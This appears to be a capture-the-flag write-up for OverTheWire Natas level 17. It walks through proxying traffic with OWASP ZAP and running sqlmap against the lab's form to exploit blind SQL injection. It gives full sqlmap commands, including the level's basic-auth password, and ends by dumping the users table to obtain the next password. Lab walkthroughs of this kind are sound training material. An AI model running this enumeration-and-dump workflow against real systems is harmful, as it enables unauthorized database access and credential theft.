Natas 17 — Blind SQL Injection with SQLMap

Photo by Sara Kurfeß on Unsplash

Welcome back to Natas’s series. Let’s take a look at Natas 17. Before jumping in, open OWASP ZAP and use the browser configure through it, that way you’ll get that fantastic HUD.

Firefox with ZAP HUD

Let’s use that HUD. First, set your scope to ‘natas17’ using the top left button (Out):

Out button

Add domain to scope

This way we’re preparing ZAP to capture the requests and responses that matter to us. Now, getting back to our level, seems like we’re back at Natas 15. We’ll deal with it like we did before, getting some input in the box and reading the output. Trying ‘natas17’… nothing. Trying ‘natas18'… nothing. We could take a look at the source-code to determine what is going on behind the curtains, but not now.

What do we know so far? We have a form with an input text that doesn’t give and output. Could it be vulnerable? Let’s take a look at the requests and see how can we use them for SQLmap:

natas request

Open a terminal window and write the SQLMap command with parameters:

$ sqlmap -u “http://natas17.natas.labs.overthewire.org/index.php" --proxy=http://127.0.0.1:8080 --data=username=natas17 --auth-type=basic --auth-cred=natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw

Let’s break things down:

• -u “http://natas17.natas.labs.overthewire.org/index.php”: it’s the natas 17 url
• --proxy=http://127.0.0.1:8080: we’re using ZAP as http proxy. This way we can take a look at the requests
• --data=username=natas17: username is the POST parameter we’re testing
• --auth-type=basic: authentication type
• --authe-cred=natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw: username/password of our current level

Press ‘enter’ and wait…

First SQLMap execution

Ok, we’ll try --level=5 and --risk=3:

sqlmap -u “http://natas17.natas.labs.overthewire.org/index.php" --proxy=http://127.0.0.1:8080 --data=username=natas18 --auth-type=basic --auth-cred=natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw --level=5 --risk=3

This will take some time.

We could add one more parameter, the ‘--dbms=mysql’ since we know it’s the DBMS used.

SQLMap output

Finally. Let’s list the databases, add the ‘--dbs’ param:

Query available DB SQLMap’s command

Now we’re going to determine the tables: -D natas17 --tables:

SQLMap’s list table content command

And the columns: -D natas17 -T users --columns:

List table content

The exploring time it’s over. It’s time to get our prize:

$ sqlmap -u “http://natas17.natas.labs.overthewire.org/index.php"--proxy=http://127.0.0.1:8080 --data=username=natas18 --auth-type=basic --auth-cred=natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw --level=5 --risk=3 --dbms=mysql -D natas17 -T users --dump

Table dump and password

Finally we got the flag. Natas 18 is up next.